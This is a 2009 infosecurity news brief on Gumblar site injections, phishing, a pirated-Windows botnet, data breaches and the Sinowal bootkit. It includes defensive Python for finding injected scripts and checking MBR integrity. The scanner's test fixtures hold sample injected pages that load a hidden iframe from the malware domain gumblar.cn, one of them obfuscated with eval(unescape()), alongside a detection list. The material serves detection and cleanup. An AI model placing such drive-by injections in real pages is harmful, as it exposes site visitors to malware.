Infosecurity Weekly Brief - May 18 2009

Infections

Malware authors co-opting Google search results are fighting back against the search giant's attempt to thwart them, using a new attack labelled 'Gumblar'. Google had been delisting compromised sites whose drive-by attacks pointed to a Latvian malware server. The criminals responded by uploading new scripts to the sites (generally using FTP credentials stolen by the malware), this time inserting obfuscated scripts that point to the gumblar.cn domain. That site has been distributing malware through exploits against Adobe Reader and Flash Player, and also opens a back door to a botnet command-and-control server associated with the forced redirections seen in the first wave of attacks. Instances of the attack soared 215% in a single week, according to ScanSafe. Others, such as Sophos, have also identified a marked increase in infected sites.
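As an added illustration of the kind of check a site owner could run over their own pages after an intrusion like this (example code written for this brief, not ScanSafe's or Sophos's scanner), the script below pulls every script block out of an HTML document, undoes the two cheap encodings injected JavaScript commonly hides behind (%xx escapes fed to unescape() and String.fromCharCode() lists) and flags blocks that name the gumblar.cn domain or carry obfuscation markers. The marker list and the sample pages are assumptions constructed for the example: they are heuristics, not a signature of the real attack.

```python
import re
from urllib.parse import unquote

# The domain named in the brief; anything added here is an assumption.
KNOWN_BAD_HOSTS = ("gumblar.cn",)
# Constructs injected JavaScript often uses to hide its payload (assumption).
OBFUSCATION_MARKERS = ("unescape(", "String.fromCharCode(", "eval(")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+)\)")


def deobfuscate(js: str) -> str:
    """Reverse %xx escapes and String.fromCharCode(...) lists.

    unquote() leaves text without %xx sequences untouched, so running it
    over a clean script is harmless.
    """
    text = unquote(js)

    def _decode_codes(match):
        return "".join(chr(int(n)) for n in match.group(1).split(",") if n.strip())

    return CHARCODE_RE.sub(_decode_codes, text)


def scan_html(html: str) -> list:
    """Return one finding per <script> block that looks injected."""
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        decoded = deobfuscate(body).lower()
        hosts = [h for h in KNOWN_BAD_HOSTS if h in decoded]
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        if hosts or markers:
            findings.append({
                "script_index": index,
                "offset": match.start(),   # byte offset of the tag in the file
                "hosts": hosts,
                "markers": markers,
            })
    return findings


# --- constructed sample pages (not captured from a real compromised site) ---
CLEAN_PAGE = '<html><body><script src="/js/site.js"></script><p>Hello</p></body></html>'

PLAIN_INJECT = ('<html><body><p>Hello</p>'
                '<script>document.write(\'<iframe src="http://gumblar.cn/" '
                'width=0 height=0></iframe>\')</script></body></html>')

# Percent-encode a payload at run time so the sample stays readable.
_payload = 'document.write("<iframe src=http://gumblar.cn/></iframe>")'
_escaped = "".join("%%%02x" % ord(c) for c in _payload)
OBFUSCATED_INJECT = ('<html><body><p>Hello</p>'
                     "<script>eval(unescape('" + _escaped + "'))</script>"
                     '</body></html>')

# 103,117,109,... spells "gumblar.cn" as character codes.
CHARCODE_INJECT = ('<html><body><script>var h=String.fromCharCode('
                   '103,117,109,98,108,97,114,46,99,110);</script></body></html>')

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("plain", PLAIN_INJECT),
                       ("escaped", OBFUSCATED_INJECT), ("charcode", CHARCODE_INJECT)]:
        print(name, scan_html(page))
```

Run it over every .html and .php file on the web root, and treat a hit on the obfuscation markers alone as something to read by hand rather than an automatic verdict: legitimate minified libraries use eval() and fromCharCode too. Cleaning the files is only half the job, since the scripts were uploaded with stolen FTP credentials; rotate those and stop using plain FTP, or the injection comes straight back.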

Facebook was the subject of yet another phishing attack. Compromised users' accounts were used to send Facebook messages asking recipients to visit sites such as 121.im or 123.im.

Pirated copies of Windows 7 were used to create a botnet of as many as 30 000 machines, according to researchers from security firm Damballa. The malware dropper that infected victims' machines was run by the unpacker bundled with the pirated image, rather than injected into the Windows binaries themselves, which made the hack relatively easy for the coders to implement.

Intrusions
A laptop stolen in March from the United Food and Commercial Workers' Union may contain the names, addresses, email addresses and social security numbers of union members, the organization said.
AVSim.com, a site carrying information for flight simulation enthusiasts, was effectively destroyed after hackers took down all of its servers. The owners, lamenting the loss of twelve years' worth of data for 60 000 users, said that they may never be able to recover the information. The hackers' motives remain unknown.

The Twitter account for the New York Times' fashion section was hacked, and the attackers used it to spam links to porn cams to the Grey Lady's half-million Twitter followers.

Protections
The National Institute of Standards and Technology (NIST) has published a draft paper on how to automatically verify security settings. The paper describes how to use the Security Content Automation Protocol (SCAP), a collection of six open specifications (XCCDF, OVAL, CCE, CPE, CVE and CVSS). SCAP has been mandated by the US Government’s Office of Management and Budget as the means of verifying security settings against the Federal Desktop Core Configuration (FDCC).

Kaspersky has built detection for a new variant of the Sinowal master boot record malware into its products. The latest version, which the company names Backdoor.Win32.Sinowal, penetrates the operating system at a lower level than it has previously seen, hooking device objects at the lowest level of the operating system to avoid detection. Because the infection lives in the master boot record, the rootkit is reloaded every time the system boots, before the operating system and any security software, and is very difficult to eradicate.
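As an added example (not Kaspersky's detection logic, and not code from the brief), here is the kind of baseline check a responder can run against a disk. It hashes the 440-byte boot code separately from the partition table, because a bootkit has to replace the former while leaving the latter intact for the machine to keep booting, and compares both against a copy taken from a known-clean system. The sample MBRs, device paths and the "known-clean" baseline are constructed for the example. One caveat that follows directly from the paragraph above: a rootkit that hooks the disk device object can hand the original sector back to any reader on the live system, so take the reading from boot media or from another host, not from inside the suspect OS.

```python
import hashlib
import struct

SECTOR = 512
BOOTCODE_LEN = 440      # boot code occupies bytes 0-439
DISK_SIG_OFFSET = 440   # 4-byte Windows disk signature, then 2 reserved bytes
PT_OFFSET = 446         # four 16-byte partition entries
SIG_OFFSET = 510        # 0x55 0xAA boot signature


def parse_mbr(data: bytes) -> dict:
    """Split a 512-byte sector into the regions a bootkit does and does not touch."""
    if len(data) != SECTOR:
        raise ValueError("MBR must be exactly %d bytes" % SECTOR)
    partitions = []
    for i in range(4):
        entry = data[PT_OFFSET + 16 * i: PT_OFFSET + 16 * (i + 1)]
        # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", entry)
        if ptype:   # type 0 means the slot is unused
            partitions.append({"status": status, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": data[SIG_OFFSET:] == b"\x55\xaa",
        "bootcode_sha256": hashlib.sha256(data[:BOOTCODE_LEN]).hexdigest(),
        "disk_signature": data[DISK_SIG_OFFSET:DISK_SIG_OFFSET + 4].hex(),
        "partitions": partitions,
    }


def diff_against_baseline(current: bytes, baseline: bytes) -> list:
    """Report which regions of the current MBR differ from the known-clean copy."""
    cur, base = parse_mbr(current), parse_mbr(baseline)
    alerts = []
    if not cur["signature_ok"]:
        alerts.append("boot signature missing")
    if cur["bootcode_sha256"] != base["bootcode_sha256"]:
        alerts.append("boot code changed")
    if cur["disk_signature"] != base["disk_signature"]:
        alerts.append("disk signature changed")
    if cur["partitions"] != base["partitions"]:
        alerts.append("partition table changed")
    return alerts


def read_mbr(device: str) -> bytes:
    r"""Read sector 0 of a raw device such as /dev/sda or \\.\PhysicalDrive0 (needs admin rights)."""
    with open(device, "rb") as fh:
        return fh.read(SECTOR)


def build_mbr(bootcode: bytes) -> bytes:
    """Assemble a constructed MBR for the demo below (not real disk data)."""
    if len(bootcode) != BOOTCODE_LEN:
        raise ValueError("bootcode must be %d bytes" % BOOTCODE_LEN)
    disk_sig = b"\xde\xad\xbe\xef" + b"\x00\x00"
    # one bootable NTFS-type (0x07) partition starting at LBA 2048
    first = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
    table = first + b"\x00" * 48
    return bootcode + disk_sig + table + b"\x55\xaa"


# Constructed baseline: a few plausible opcode bytes padded with NOPs.
CLEAN_MBR = build_mbr(b"\xfa\x33\xc0" + b"\x90" * (BOOTCODE_LEN - 3))
# Same disk with the boot code replaced and the partition table left intact,
# which is the pattern an MBR rootkit leaves behind.
TAMPERED_MBR = build_mbr(b"\xeb\xfe" + b"\xcc" * (BOOTCODE_LEN - 2))

if __name__ == "__main__":
    print("clean   :", diff_against_baseline(CLEAN_MBR, CLEAN_MBR))
    print("tampered:", diff_against_baseline(TAMPERED_MBR, CLEAN_MBR))
```

In practice the baseline is the boot-code hash recorded when the machine was built (or the hash of the stock Windows MBR for that version); store it off the host, since anything kept on the same disk is within the rootkit's reach.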

Former One Laptop Per Child security architect Ivan Krstic has started at Apple, where he will help secure the firm's as-yet largely unexploited operating system, which it also updated this week.

Lawmakers introduced the Critical Electric Infrastructure Protection Act in an attempt to get the US electricity industry to do what it has apparently not been doing: secure its networks against attack.

Misdirections
Wired thinks that STRATCOM might consider nuking cyber-attackers - something that Russian officials have also left on the table. Let's hope not. We'd much rather have someone turn the lights off than walk down Cormac McCarthy's The Road.
